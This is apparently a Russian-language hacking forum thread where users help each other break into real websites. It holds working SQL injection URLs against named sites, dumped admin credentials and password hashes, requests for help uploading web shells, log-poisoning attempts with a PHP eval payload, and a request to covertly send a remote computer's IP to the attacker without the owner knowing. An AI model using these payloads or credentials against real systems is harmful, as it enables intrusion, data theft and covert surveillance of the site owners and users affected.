блин, и сколько будет продолжатся античатопедия? никакого пароля там нет, мб лучше немного изучать никсы? структура /etc/passwd usernameassword(пусто):uid:gid:comments:home dir:shell
есть ли прога которой можно сдампить много баз? а то sqli helper и mysqli dumper по одной базе приходиться дампить
http://www.dknews.kz/article.php?id=4353+and+1=2+union+select+version(),2222,3333+--+ смотри тайтл З.Ы. а если хочешь понять почему в твоём варианте не отображало, то попробуй написать http://www.dknews.kz/article.php?id=4353&archid=115+and+1=0+union+select+11111,2222,3333,4444,5555--+ и увидишь "Архивные данные за 22 Января 3333 года"
Достал из БД 5.0.51a-24+lenny2-log пароль admina подскажите какой алгоритм шифрования? admin:adhEqiFPgCuTo noname:notE52y2N6MfM
подскажите как тут http://redbox.sg/products.php?cat_id=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- залить шелл, пробовал как написано в статьях и ничего не получается
Code: http://redbox.sg/products.php ?cat_id=-61+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from user-- redbox_admin:hooyinting Ищешь админку, заливаешь шелл)
Помогите пожалуйста раскрутить LFI! Вариант с /proc/self/environ не прокатывает, ибо FreeBSD. Отыскал место хранения логов error_log и access_log. Прочитал все что нашел по LFI, в том числе статью уважаемого Expl0ited'a, но никак пока не получается. Отправляю запрос подключившись через телнет вида: POST http://site.com/epicfaaaaaail.php<?php eval($_GET[cmd])?> HTTP/1.1 Смотрю в access_log: [23/Jan/2011:12:33:40 -0800] "POST http://site.com/epicfaaaaaail.php<br /> <b>Parse error</b>: syntax error, unexpected $end in <b>/usr/local/apache/logs/site.com-access_log(139780) : eval()'d code</b> on line <b>1</b><br /> HTTP/1.1" 404 219 Отправляю по другому: GET /<?php eval($_GET[cmd])?> HTTP/1.1 А там: [23/Jan/2011:12:25:19 -0800] POST / HTTP/1.1" 200 5346 Третий сделал как в статье: GET http://site.com/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5D%29%3F%3E HTTP/1.1 В логе: [23/Jan/2011:12:25:19 -0800] "GET http://site.com/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5D%29%3F%3E HTTP/1.1 " 404 215 И еще стопиццотыщ вариантов... В итоге не access_log&cmd=ls, не access_log&cmd=phpinfo(); не работают... Что можно еще применить?
Что можете подсказать для того что бы при каждой смене IP на удаленном компьютере. Мне на хостинг (а лучше е-мейл) приходил отчет о том под каким IP сейчас работает ПК. Естественно надо что бы пользователь удаленной машины не знал об этом.
Как то мне тоже нужно было нечто подобное, я заюзал xStarter. Отличная штука. Но я настроил ее чтобы она посылала IP-адрес мне на аську, думаю и отправка на мыло должна быть. Все работало четко. Проверено. Да если бы, я б с удовольствием воспользовался... Я же логи вижу полностью, и access и error, ничего подобного типа юзер-агента там нет. Только айпишник, дата и урл...
Подскажите что за база такая? Кто нибудь сталкивался с таким? Как его можно использовать? фтп-шник Pure-FTPd FTP server при подсоединении показывает приветствие пробовал через Load File делать /etc/pureftpd.passwd не получилось
А там к сожалению палевный значок в трее. Имхо, это как то скрыть можно. Но закачивать кучу софта на удаленный комп, не оптимальный вариант.
Помогите пожалуйста раскрутить SQL иньекцию: http://www.citi zens hip.ru/index.php?art=233 вроде как 8 полей. Заранее благодарен.
http://ranak.by/news.php?id=-2608+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5+--+ 4.0.24_Debian-10sarge1-log:ranakby:ranakby@localhost мдя уж.... голова для того что бы дождь в шею не лил?
крути как слепую скажу одно, сайт на мастерхосте, админка если она есть(я не искал) скорее всего на бейсик авторизации, залить шелл через форум или блог если есть..и если зальешь шелл , увeряю прав там немного будет..
